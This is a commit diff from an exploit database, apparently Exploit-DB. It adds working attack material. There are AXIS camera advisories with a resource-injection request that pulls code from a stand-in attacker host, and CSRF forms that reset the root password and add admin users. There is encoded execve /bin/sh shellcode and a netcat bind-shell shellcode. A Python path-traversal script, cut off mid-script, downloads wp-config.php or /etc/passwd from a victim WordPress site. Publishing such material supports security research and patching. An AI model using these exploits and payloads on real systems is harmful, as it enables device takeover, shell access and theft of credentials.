DB: 2017-03-18
8 new exploits Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow FTPShell Client 6.53 - Local Buffer Overflow Linux/x86 - Encoded exceve(_/bin/sh_) Shellcode (44 Bytes) Linux/x86 - Bind Shell Shellcode (51 bytes) Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download AXIS Communications - Cross-Site Scripting / Content Injection AXIS Multiple Products - Cross-Site Request Forgery Departmental Store Management System 1.2 - SQL Injection
This commit is contained in:
parent
5b8d706b7d
commit
4da96605a4
9 changed files with 661 additions and 0 deletions
|
@ -5397,7 +5397,9 @@ id,file,description,date,author,platform,type,port
|
||||||
41611,platforms/multiple/dos/41611.txt,"Adobe Flash - ATF Planar Decompression Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
|
41611,platforms/multiple/dos/41611.txt,"Adobe Flash - ATF Planar Decompression Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
|
||||||
41612,platforms/multiple/dos/41612.txt,"Adobe Flash - AVC Header Slicing Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
|
41612,platforms/multiple/dos/41612.txt,"Adobe Flash - AVC Header Slicing Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
|
||||||
41615,platforms/windows/dos/41615.txt,"Microsoft Windows - 'LoadUvsTable()' Heap-based Buffer Overflow",2017-03-15,"Hossein Lotfi",windows,dos,0
|
41615,platforms/windows/dos/41615.txt,"Microsoft Windows - 'LoadUvsTable()' Heap-based Buffer Overflow",2017-03-15,"Hossein Lotfi",windows,dos,0
|
||||||
|
41620,platforms/windows/dos/41620.txt,"Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow",2017-03-16,"Nassim Asrir",windows,dos,0
|
||||||
41623,platforms/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",windows,dos,0
|
41623,platforms/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",windows,dos,0
|
||||||
|
41629,platforms/windows/dos/41629.py,"FTPShell Client 6.53 - Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,windows,dos,0
|
||||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||||
|
@ -15956,6 +15958,8 @@ id,file,description,date,author,platform,type,port
|
||||||
41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
|
41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||||
41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
|
41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||||
41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0
|
41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0
|
||||||
|
41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - Encoded exceve(_/bin/sh_) Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0
|
||||||
|
41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (51 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
|
||||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||||
|
@ -37534,3 +37538,7 @@ id,file,description,date,author,platform,type,port
|
||||||
41616,platforms/ruby/webapps/41616.rb,"GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution",2017-03-15,iblue,ruby,webapps,0
|
41616,platforms/ruby/webapps/41616.rb,"GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution",2017-03-15,iblue,ruby,webapps,0
|
||||||
41617,platforms/php/webapps/41617.txt,"Steam Profile Integration 2.0.11 - SQL injection",2017-03-13,DrWhat,php,webapps,0
|
41617,platforms/php/webapps/41617.txt,"Steam Profile Integration 2.0.11 - SQL injection",2017-03-13,DrWhat,php,webapps,0
|
||||||
41618,platforms/aspx/webapps/41618.txt,"Sitecore CMS 8.1 Update-3 - Cross-Site Scripting",2017-03-15,"Pralhad Chaskar",aspx,webapps,0
|
41618,platforms/aspx/webapps/41618.txt,"Sitecore CMS 8.1 Update-3 - Cross-Site Scripting",2017-03-15,"Pralhad Chaskar",aspx,webapps,0
|
||||||
|
41622,platforms/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",php,webapps,0
|
||||||
|
41625,platforms/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,hardware,webapps,0
|
||||||
|
41626,platforms/hardware/webapps/41626.txt,"AXIS Multiple Products - Cross-Site Request Forgery",2017-03-17,Orwelllabs,hardware,webapps,0
|
||||||
|
41627,platforms/php/webapps/41627.txt,"Departmental Store Management System 1.2 - SQL Injection",2017-03-17,"Ihsan Sencan",php,webapps,0
|
||||||
|
|
Can't render this file because it is too large.
|
229
platforms/hardware/webapps/41625.txt
Executable file
229
platforms/hardware/webapps/41625.txt
Executable file
|
@ -0,0 +1,229 @@
|
||||||
|
0RWELLL4BS
|
||||||
|
**********
|
||||||
|
security advisory
|
||||||
|
olsa-2015-8258
|
||||||
|
PGP: 79A6CCC0
|
||||||
|
@orwelllabs
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Advisory Information
|
||||||
|
====================
|
||||||
|
- Title: ImagePath Resource Injection/Open script editor
|
||||||
|
- Vendor: AXIS Communications
|
||||||
|
- Research and Advisory: Orwelllabs
|
||||||
|
- Class: Improper Input Validation [CWE-20]
|
||||||
|
- CVE Name: CVE-2015-8258
|
||||||
|
- Affected Versions: Firmwares versions <lt 5.80.x
|
||||||
|
- IoT Attack Surface: Device Administrative Interface/Authentication/Autho
|
||||||
|
rization
|
||||||
|
- OWASP IoTTop10: I1, I2
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Technical Details
|
||||||
|
=================
|
||||||
|
The variable "imagePath=" (that is prone to XSS in a large range of
|
||||||
|
products) also can be used to resource injection intents. If inserted a URL
|
||||||
|
in this variable will be made an GET request to this URL, so this an
|
||||||
|
interesting point to request malicious codes from the attacker machine, and
|
||||||
|
of course, the possibilities are vast (including hook the browser).
|
||||||
|
|
||||||
|
|
||||||
|
An attacker sends the following URL for the current Web user interface of
|
||||||
|
the camera:
|
||||||
|
http://{AXISVULNHOST}/view.shtml?imagepath=http://www.3vilh0
|
||||||
|
st.com/evilcode.html
|
||||||
|
|
||||||
|
This request will be processed normally and will return the status code 200
|
||||||
|
(OK):
|
||||||
|
|
||||||
|
[REQUEST]
|
||||||
|
|
||||||
|
GET /view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html HTTP/1.1
|
||||||
|
Host: {axisvulnhost}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101
|
||||||
|
Firefox/41.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Authorization: Digest username="Winst0n", realm="AXIS_XXXXXXXXXXX",
|
||||||
|
nonce="00978cY6s4g@Sadd1b11a9A6ed955e1b5ce9eb",
|
||||||
|
uri="/view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html",
|
||||||
|
response="5xxxxxxxxxxxxxxxxxxxxxx", qop=auth,
|
||||||
|
nc=0000002b, cnonce="00rw3ll4bs0rw3lll4bs"
|
||||||
|
Connection: keep-alive
|
||||||
|
|
||||||
|
|
||||||
|
GET /evilcode.html HTTP/1.1
|
||||||
|
Host: www.3vilh0st.com
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101
|
||||||
|
Firefox/41.0
|
||||||
|
Accept: image/png,image/*;q=0.8,*/*;q=0.5
|
||||||
|
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Referer: http://{axisvulnhost}/view.shtml?imagepath=http://www.3vilh0
|
||||||
|
st.com/evilcode.html
|
||||||
|
Connection: keep-alive
|
||||||
|
|
||||||
|
The server response can be seen below (with the clipping of the affected
|
||||||
|
HTML code snippets - just look for "http://www.3vilh0st.com/evilcode.html"):
|
||||||
|
|
||||||
|
|
||||||
|
<table border="0" cellpadding="3" cellspacing="3">
|
||||||
|
<tr>
|
||||||
|
<td id="videoStreamTable">
|
||||||
|
<script language="JavaScript">
|
||||||
|
<!--
|
||||||
|
video('http://www.3vilh0st.com/evilcode.html');
|
||||||
|
// -->
|
||||||
|
</script>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
|
||||||
|
[..SNIP..]
|
||||||
|
|
||||||
|
function listVideoSources()
|
||||||
|
{
|
||||||
|
var formInt = document.listFormInt;
|
||||||
|
var formExt = document.listFormExt;
|
||||||
|
var formCrop = document.listFormCrop;
|
||||||
|
var presetForm = document.listFormPreset;
|
||||||
|
var form = document.WizardForm
|
||||||
|
var currentPath = 'http://www.3vilh0st.com/evilcode.html';
|
||||||
|
var imageSource;
|
||||||
|
|
||||||
|
[..SNIP..]
|
||||||
|
|
||||||
|
var reload = false;
|
||||||
|
reload |= (other != null && other.search("seq=yes") >= 0);
|
||||||
|
reload |= (other != null && other.search("streamprofile=") >= 0);
|
||||||
|
reload |= ((other == null || (other != null && other.search("streamprofile=
|
||||||
|
;)(r") == -1)) && ('' != ""));
|
||||||
|
reload |= (imagePath != 'http://www.3vilh0st.com/evilcode.html');
|
||||||
|
|
||||||
|
[..SNIP..]
|
||||||
|
|
||||||
|
<script SRC="/incl/activeX.js?id=69"></script>
|
||||||
|
</head>
|
||||||
|
<body class="bodyBg" topmargin="0" leftmargin="15" marginwidth="0"
|
||||||
|
marginheight="0" onLoad="DrawTB('no', 'http://www.3vilh0st.com/evilcode.html',
|
||||||
|
'1', '0', 'no', 'no', 'true', getStreamProfileNbr());" onResize="">
|
||||||
|
<script language="JavaScript">
|
||||||
|
|
||||||
|
[..SNIP..]
|
||||||
|
|
||||||
|
// Draw the scale buttons
|
||||||
|
var currentResolution = 0
|
||||||
|
var width = 0
|
||||||
|
var height = 0
|
||||||
|
var imagepath = "http://www.3vilh0st.com/evilcode.html"
|
||||||
|
var resStart = imagepath.indexOf("resolution=")
|
||||||
|
if (resStart != -1) {
|
||||||
|
var resStop = imagepath.indexOf("&", resStart)
|
||||||
|
|
||||||
|
[..SNIP..]
|
||||||
|
|
||||||
|
|
||||||
|
=================== view.shtml snips =====================
|
||||||
|
|
||||||
|
447 function zoom(size)
|
||||||
|
448 {
|
||||||
|
449 var url = document.URL;
|
||||||
|
450
|
||||||
|
451 if (url.indexOf("?") == -1) {
|
||||||
|
452 url += "F?size=" + size
|
||||||
|
453 } else if (url.indexOf("size=") == -1) {
|
||||||
|
454 url += "&size=" + size
|
||||||
|
455 } else {
|
||||||
|
456 var searchStr = "size=<!--#echo var="size"
|
||||||
|
option="encoding:javascript" -->"
|
||||||
|
457 var replaceStr = "size=" + size
|
||||||
|
458 var re = new RegExp(searchStr , "g")
|
||||||
|
459 url = url.replace(re, replaceStr)
|
||||||
|
460 }
|
||||||
|
461
|
||||||
|
462 document.location = url;
|
||||||
|
463 }
|
||||||
|
464
|
||||||
|
465 var aNewImagePath;
|
||||||
|
466
|
||||||
|
467 function reloadPage()
|
||||||
|
468 {
|
||||||
|
469 document.location = aNewImagePath;
|
||||||
|
470 }
|
||||||
|
471
|
||||||
|
|
||||||
|
[ SNIP ]
|
||||||
|
|
||||||
|
567 aNewImagePath = '/view/view.shtml?id=<!--#echo
|
||||||
|
var="ssi_request_id" option="encoding:url" -->&imagePath=' +
|
||||||
|
escape(imagePath) + size;
|
||||||
|
568 if (other != null)
|
||||||
|
569 aNewImagePath += other;
|
||||||
|
570 <!--#if expr="$ptzpresets = yes" -->
|
||||||
|
571 /* append preset parameters so that preset postion is selected in
|
||||||
|
drop down list after reload */
|
||||||
|
572 if (presetName != '')
|
||||||
|
573 aNewImagePath += "&gotopresetname=" + escape(presetName);
|
||||||
|
574 else if (gotopresetname != '')
|
||||||
|
575 aNewImagePath += "&gotopresetname=" + escape(gotopresetname);
|
||||||
|
576
|
||||||
|
577 if( newCamera != '')
|
||||||
|
578 aNewImagePath += "&camera=" + escape(newCamera);
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
---*---
|
||||||
|
Some legitimate resources can be very interesting to cybercriminals with
|
||||||
|
your hansowares/botnets/bitcoinminer/backdoors/malwares etc. In this case
|
||||||
|
there are some resources, like the "Open Script Editor". By this resource
|
||||||
|
the user can edit any file in the operation system with root privileges,
|
||||||
|
because everything (in the most part of IoT devices) runs with root
|
||||||
|
privileges, this is other dangerous point to keep in mind.
|
||||||
|
|
||||||
|
> Open Script Editor path: 'System Options' -> 'Advanced' -> 'Scripting'
|
||||||
|
|
||||||
|
Well, one can say that this feature is restricted to the administrator of
|
||||||
|
the camera, and this would be true if customers were forced to change the
|
||||||
|
default password during setup phase with a strong password policy, since
|
||||||
|
change "pass" to "pass123" does not solve the problem. The aggravating
|
||||||
|
factor is that there are thousands of products available on the internet,
|
||||||
|
running with default credentials.
|
||||||
|
|
||||||
|
|
||||||
|
Vendor Information, Solutions and Workarounds
|
||||||
|
+++++++++++++++++++++++++++++++++++++++++++++
|
||||||
|
According to the manufacturer, the resource injection vulnerability was
|
||||||
|
fixed in firmware 5.60, but we identified that the problem still occurred
|
||||||
|
in 5.80.x versions of various product models. Check for updates on the
|
||||||
|
manufacturer's website.
|
||||||
|
|
||||||
|
About Open Script Editor,It was considered that in order to have access to
|
||||||
|
this feature, it is necessary to be authenticated as an admin, but if there
|
||||||
|
is no policy that forces the client to change the password during the
|
||||||
|
product setup (ease vs. security) and also requires a password complexity,
|
||||||
|
having an administrative credential to abuse the functionality is not
|
||||||
|
exactly an impediment (e.g: botnets that bring embedded in the code a
|
||||||
|
relation of default credentials for that type of device)
|
||||||
|
|
||||||
|
|
||||||
|
Credits
|
||||||
|
=======
|
||||||
|
These vulnerabilities has been discovered and published by Orwelllabs.
|
||||||
|
|
||||||
|
|
||||||
|
Legal Notices
|
||||||
|
=============
|
||||||
|
The information contained within this advisory is supplied "as-is" with no
|
||||||
|
warranties or guarantees of fitness of use or otherwise. We accept no
|
||||||
|
responsibility for any damage caused by the use or misuse of this
|
||||||
|
information.
|
||||||
|
|
||||||
|
|
||||||
|
About Orwelllabs
|
||||||
|
================
|
||||||
|
https://www.exploit-db.com/author/?a=8225
|
||||||
|
https://packetstormsecurity.com/files/author/12322/
|
103
platforms/hardware/webapps/41626.txt
Executable file
103
platforms/hardware/webapps/41626.txt
Executable file
|
@ -0,0 +1,103 @@
|
||||||
|
0RWELLL4BS
|
||||||
|
**********
|
||||||
|
security advisory
|
||||||
|
olsa-CVE-2015-8255
|
||||||
|
PGP: 79A6CCC0
|
||||||
|
@orwelllabs
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Advisory Information
|
||||||
|
====================
|
||||||
|
- Title: Cross-Site Request Forgery
|
||||||
|
- Vendor: AXIS Communications
|
||||||
|
- Research and Advisory: Orwelllabs
|
||||||
|
- Class: Session Management control [CWE-352]
|
||||||
|
- CVE Name: CVE-2015-8255
|
||||||
|
- Affected Versions:
|
||||||
|
- IoT Attack Surface: Device Web Interface
|
||||||
|
- OWASP IoTTop10: I1
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Technical Details
|
||||||
|
=================
|
||||||
|
Because of the own (bad) design of this kind of device (Actualy a big
|
||||||
|
problem of IoT, one of them)
|
||||||
|
The embedded web application does not verify whether a valid request was
|
||||||
|
intentionally provided by the user who submitted the request.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
PoCs
|
||||||
|
====
|
||||||
|
#-> Setting root password to W!nst0n
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<!-- CSRF PoC Orwelllabs -->
|
||||||
|
<body>
|
||||||
|
<form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
|
||||||
|
<input type="hidden" name="action" value="update" />
|
||||||
|
<input type="hidden" name="user" value="root" />
|
||||||
|
<input type="hidden" name="pwd" value="w!nst0n" />
|
||||||
|
<input type="hidden" name="comment" value="Administrator" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
|
||||||
|
#-> Adding new credential SmithW:W!nst0n
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<!-- CSRF PoC - Orwelllabs -->
|
||||||
|
<body>
|
||||||
|
<form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
|
||||||
|
<input type="hidden" name="action" value="add" />
|
||||||
|
<input type="hidden" name="user" value="SmithW" />
|
||||||
|
<input type="hidden" name="sgrp"
|
||||||
|
value="viewer:operator:admin:ptz" />
|
||||||
|
<input type="hidden" name="pwd" value="W!nst0n" />
|
||||||
|
<input type="hidden" name="grp" value="users" />
|
||||||
|
<input type="hidden" name="comment" value="WebUser" />
|
||||||
|
<input type="submit" value="Submit request" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
|
||||||
|
|
||||||
|
#-> Deleting an app via directly CSRF (axis_update.shtml)
|
||||||
|
|
||||||
|
http://xxx.xxx.xxx.xxx/axis-cgi/vaconfig.cgi?action=get&name=<script src="
|
||||||
|
http://xxx.xxx.xxx.xxx/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml
|
||||||
|
"></script>
|
||||||
|
|
||||||
|
|
||||||
|
[And many acitions allowed to an user [all of them?] can be forged in this
|
||||||
|
way]
|
||||||
|
|
||||||
|
|
||||||
|
Vendor Information, Solutions and Workarounds
|
||||||
|
+++++++++++++++++++++++++++++++++++++++++++++
|
||||||
|
Well, this is a very old design problem of this kind of device, nothing new
|
||||||
|
to say about that.
|
||||||
|
|
||||||
|
|
||||||
|
Credits
|
||||||
|
=======
|
||||||
|
These vulnerabilities has been discovered and published by Orwelllabs.
|
||||||
|
|
||||||
|
|
||||||
|
Legal Notices
|
||||||
|
=============
|
||||||
|
The information contained within this advisory is supplied "as-is" with no
|
||||||
|
warranties or guarantees of fitness of use or otherwise. We accept no
|
||||||
|
responsibility for any damage caused by the use or misuse of this
|
||||||
|
information.
|
||||||
|
|
||||||
|
|
||||||
|
About Orwelllabs
|
||||||
|
================
|
||||||
|
https://www.exploit-db.com/author/?a=8225
|
||||||
|
https://packetstormsecurity.com/files/author/12322/
|
84
platforms/lin_x86/shellcode/41630.asm
Executable file
84
platforms/lin_x86/shellcode/41630.asm
Executable file
|
@ -0,0 +1,84 @@
|
||||||
|
;================================================================================
|
||||||
|
; The MIT License
|
||||||
|
;
|
||||||
|
; Copyright (c) <year> <copyright holders>
|
||||||
|
;
|
||||||
|
; Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||||
|
; of this software and associated documentation files (the "Software"), to deal
|
||||||
|
; in the Software without restriction, including without limitation the rights
|
||||||
|
; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||||
|
; copies of the Software, and to permit persons to whom the Software is
|
||||||
|
; furnished to do so, subject to the following conditions:
|
||||||
|
;
|
||||||
|
; The above copyright notice and this permission notice shall be included in
|
||||||
|
; all copies or substantial portions of the Software.
|
||||||
|
;
|
||||||
|
; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||||
|
; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||||
|
; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||||
|
; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||||
|
; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||||
|
; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
|
||||||
|
; THE SOFTWARE.
|
||||||
|
;================================================================================
|
||||||
|
; Name : Encrypt Linux x86 Shellcode(44 Bytes) To exceve("/bin/sh")
|
||||||
|
; Author : WangYihang
|
||||||
|
; Email : wangyihanger@gmail.com
|
||||||
|
; Tested on: Linux_x86
|
||||||
|
; Shellcode Length: 44
|
||||||
|
;================================================================================
|
||||||
|
; Shellcode :
|
||||||
|
; char shellcode[] = "\xeb\x10\x5e\x31\xc9\xb1\x15\x8a"
|
||||||
|
; "\x06\x34\xe9\x88\x06\x46\xe2\xf7"
|
||||||
|
; "\xeb\x05\xe8\xeb\xff\xff\xff\xd8"
|
||||||
|
; "\x20\xb8\x81\xc6\xc6\x9a\x81\x81"
|
||||||
|
; "\xc6\x8b\x80\x87\x60\x0a\x83\xe2"
|
||||||
|
; "\xb1\x70\x24\x69";
|
||||||
|
;================================================================================
|
||||||
|
; Python :
|
||||||
|
; shellcode = "\xeb\x10\x5e\x31\xc9\xb1\x15\x8a\x06\x34\xe9\x88\x06\x46\xe2\xf7\xeb\x05\xe8\xeb\xff\xff\xff\xd8\x20\xb8\x81\xc6\xc6\x9a\x81\x81\xc6\x8b\x80\x87\x60\x0a\x83\xe2\xb1\x70\x24\x69"
|
||||||
|
;================================================================================
|
||||||
|
; Assembly language code :
|
||||||
|
|
||||||
|
global _start
|
||||||
|
; this shell code will xor every byte of 'jocker' segment , then execute them
|
||||||
|
; password is 0xe9 (233)
|
||||||
|
_start:
|
||||||
|
jmp jocker
|
||||||
|
loader:
|
||||||
|
pop esi ; get address of encrypted shellcode
|
||||||
|
xor ecx, ecx
|
||||||
|
mov cl, 21 ; loop times (length of encrypt shellcode)
|
||||||
|
decrypt:
|
||||||
|
mov al, [esi]
|
||||||
|
xor al, 0e9H
|
||||||
|
mov [esi], al
|
||||||
|
inc esi
|
||||||
|
loop decrypt
|
||||||
|
jmp encrypt
|
||||||
|
|
||||||
|
jocker:
|
||||||
|
call loader
|
||||||
|
encrypt:
|
||||||
|
db 0d8H
|
||||||
|
db 20H
|
||||||
|
db 0b8H
|
||||||
|
db 81H
|
||||||
|
db 0c6H
|
||||||
|
db 0c6H
|
||||||
|
db 9aH
|
||||||
|
db 81H
|
||||||
|
db 81H
|
||||||
|
db 0c6H
|
||||||
|
db 8bH
|
||||||
|
db 80H
|
||||||
|
db 87H
|
||||||
|
db 60H
|
||||||
|
db 0aH
|
||||||
|
db 83H
|
||||||
|
db 0e2H
|
||||||
|
db 0b1H
|
||||||
|
db 70H
|
||||||
|
db 24H
|
||||||
|
db 69H
|
||||||
|
;================================================================================
|
49
platforms/lin_x86/shellcode/41631.c
Executable file
49
platforms/lin_x86/shellcode/41631.c
Executable file
|
@ -0,0 +1,49 @@
|
||||||
|
/*
|
||||||
|
# Super_Small_Bind_Shell (x86)
|
||||||
|
# Date: 17.03.2017
|
||||||
|
# This shellcode will listen on port 37 and show you how deep the rabbit hole goes
|
||||||
|
# Please note that 37 port is below 1024 and thus privileged!
|
||||||
|
# Shellcode Author: ALEH BOITSAU
|
||||||
|
# Shellcode Length: 51 bytes ;)
|
||||||
|
# Tested on: Debian GNU/Linux 8/x86_64
|
||||||
|
# Command: gcc -m32 -z execstack super_small_bind_shell.c -o super_small_bind_shell
|
||||||
|
|
||||||
|
global _start
|
||||||
|
section .text
|
||||||
|
_start:
|
||||||
|
xor eax, eax
|
||||||
|
push eax
|
||||||
|
push 0x3733702d ;-p37
|
||||||
|
mov esi, esp
|
||||||
|
|
||||||
|
push eax
|
||||||
|
push 0x68732f2f ;-le//bin//sh
|
||||||
|
push 0x6e69622f
|
||||||
|
push 0x2f656c2d
|
||||||
|
mov edi, esp
|
||||||
|
|
||||||
|
push eax
|
||||||
|
push 0x636e2f2f ;/bin//nc
|
||||||
|
push 0x6e69622f
|
||||||
|
mov ebx, esp
|
||||||
|
|
||||||
|
push eax
|
||||||
|
push esi
|
||||||
|
push edi
|
||||||
|
push ebx
|
||||||
|
mov ecx, esp
|
||||||
|
mov al,11
|
||||||
|
int 0x80
|
||||||
|
*/
|
||||||
|
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <string.h>
|
||||||
|
|
||||||
|
unsigned char shellcode[] =
|
||||||
|
"\x31\xc0\x50\x68\x2d\x70\x33\x37\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x50\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80";
|
||||||
|
main()
|
||||||
|
{
|
||||||
|
printf("Shellcode Length: %d\n",strlen(shellcode));
|
||||||
|
int (*ret)() = (int(*)())shellcode;
|
||||||
|
ret();
|
||||||
|
}
|
60
platforms/php/webapps/41622.py
Executable file
60
platforms/php/webapps/41622.py
Executable file
|
@ -0,0 +1,60 @@
|
||||||
|
import requests
|
||||||
|
import string
|
||||||
|
import random
|
||||||
|
from urlparse import urlparse
|
||||||
|
|
||||||
|
print "---------------------------------------------------------------------"
|
||||||
|
print "Wordpress Plugin Membership Simplified v1.58 - Arbitrary File Download\nDiscovery: Larry W. Cashdollar\nExploit Author: Munir Njiru\nWebsite: https://www.alien-within.com\nCVE-2017-1002008\nCWE: 23\n\nReference URLs:\nhttp://www.vapidlabs.com/advisory.php?v=187"
|
||||||
|
print "---------------------------------------------------------------------"
|
||||||
|
victim = raw_input("Please Enter victim host e.g. http://example.com: ")
|
||||||
|
file_choice=raw_input ("\n Please choose a number representing the file to attack: \n1. Wordpress Config \n2. Linux Passwd File\n")
|
||||||
|
if file_choice == "1":
|
||||||
|
payload="..././..././..././wp-config.php"
|
||||||
|
elif file_choice == "2":
|
||||||
|
payload="..././..././..././..././..././..././..././..././etc/passwd"
|
||||||
|
else:
|
||||||
|
print "Invalid Download choice, Please choose 1 or 2; Alternatively you can re-code me toI will now exit"
|
||||||
|
quit()
|
||||||
|
slug = "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file="+payload
|
||||||
|
target=victim+slug
|
||||||
|
def randomizeFile(size=6, chars=string.ascii_uppercase + string.digits):
|
||||||
|
return ''.join(random.choice(chars) for _ in range(size))
|
||||||
|
|
||||||
|
def checkPlugin():
|
||||||
|
pluginExists = requests.get(victim+"/wp-content/plugins/membership-simplified-for-oap-members-only/download.php")
|
||||||
|
pluginExistence = pluginExists.status_code
|
||||||
|
if pluginExistence == 200:
|
||||||
|
print "\nI can reach the target & it seems vulnerable, I will attempt the exploit\nRunning exploit..."
|
||||||
|
exploit()
|
||||||
|
else:
|
||||||
|
print "Target has a funny code & might not be vulnerable, I will now exit\n"
|
||||||
|
quit()
|
||||||
|
|
||||||
|
def exploit():
|
||||||
|
|
||||||
|
getThatFile = requests.get(target)
|
||||||
|
fileState = getThatFile.status_code
|
||||||
|
breakApart=urlparse(victim)
|
||||||
|
extract_hostname=breakApart.netloc
|
||||||
|
randomDifferentiator=randomizeFile()
|
||||||
|
cleanName=str(randomDifferentiator)
|
||||||
|
if fileState == 200:
|
||||||
|
respFromThatFile = getThatFile.text
|
||||||
|
